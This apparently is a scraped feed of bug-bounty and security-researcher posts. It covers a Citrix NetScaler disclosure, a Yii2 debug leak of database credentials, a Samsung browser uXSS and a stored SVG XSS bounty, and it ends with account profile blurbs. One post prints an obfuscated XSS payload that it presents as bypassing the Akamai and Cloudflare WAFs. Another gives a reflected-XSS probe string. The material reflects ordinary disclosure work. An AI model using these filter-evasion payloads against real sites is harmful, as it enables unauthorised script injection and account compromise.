What do we even say at this point?
CVE-2026-8451, a zero-day Memory Overread that watchTowr Labs identified in Citrix NetScaler appliances in March, has just been publicly disclosed with patches.
We're not done yet... speak soon... ;-)
labs.watchtowr.com/citrixbleed-to…
New subdomain went live
Yii2 debug mode enabled → Full database credentials leaked in stack trace
Just 3 hours later → Access Forbidden
Continuous monitoring isn’t optional
Note: This subdomain was only discoverable via DNS brute-force
It's time for sharing, this is not a simple write-up, we are sharing our methodology and reasoning, detailing how we approached and hunted the flaw, I hope you like it :]
blog.voorivex.team/uxss-on-samsun…
We got permission from the Samsung Security team to disclose this uXSS that we found in Samsung Browser, it was assigned a CVE (CVE-2025-58485) and patched.
Here is the PoC, expect the write-up in the next upcoming days.
Yay, i was rewarded $1500
Bug: Stored XSS via an SVG file led to full account data exposure
Tip: Always try to exploit XSS and don’t just report it with a simple alert
I just found a WAF bypass for Akamai and Cloudflare:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
rXSS via url parameter
1. I discovered reflection in a URL parameter
2. All inputs I submitted were being HTML encoded
3. I submitted the following input: https://sss'"<>, and in the response, my payload was displayed without proper sanitization.
#xss#BugBounty#infosec
5K Followers 2K Followingspread love ❤️ | red teamer | bug bounty hunter📚👨🏾💻 | not here to talk to you, i’m either tweeting about my thoughts, cats, hacks, or music I enjoy
38K Followers 183 FollowingNuclei uses a vast templating library to scan applications, cloud infrastructure, and networks to find and remediate vulnerabilities.
1.6M Followers 2 FollowingWe're an AI safety and research company that builds reliable, interpretable, and steerable AI systems. Talk to our AI assistant @claudeai on https://t.co/FhDI3KQh0n.
1.7M Followers 2 FollowingClaude is an AI assistant built by @anthropicai to be safe, accurate, and secure. Talk to Claude on https://t.co/ZhTwG8dz3D or download the app.
2K Followers 0 Followingاینترنت قطع است و در این خاموشی زندگی ذرهذره از بین میرود.
«روایت خاموشی» روایتهای واقعی افرادی را ثبت میکند که از قطعی اینترنت در ایران آسیب دیدهاند.
552 Followers 3 FollowingAI security engineer that plans, hunts, and investigates - giving every security team the depth of a senior engineer at machine speed.
26K Followers 1K Followingعلاقهمند به کامپیوتر و شبکه | در حال تقویت حل مسئله با Rust&Go🦀 و یادگیری System Design
دونیت: https://t.co/7EJsO3DInu (Consider What I said above)
1K Followers 0 FollowingExpert-led penetration testing, supported by AI-assisted analysis, to uncover real weaknesses and strengthen systems against real-world threats.
49K Followers 616 FollowingThe power behind the @Synack platform is an elite team of the world's top cybersecurity researchers. Our best are honored at https://t.co/6bEAyp7HWJ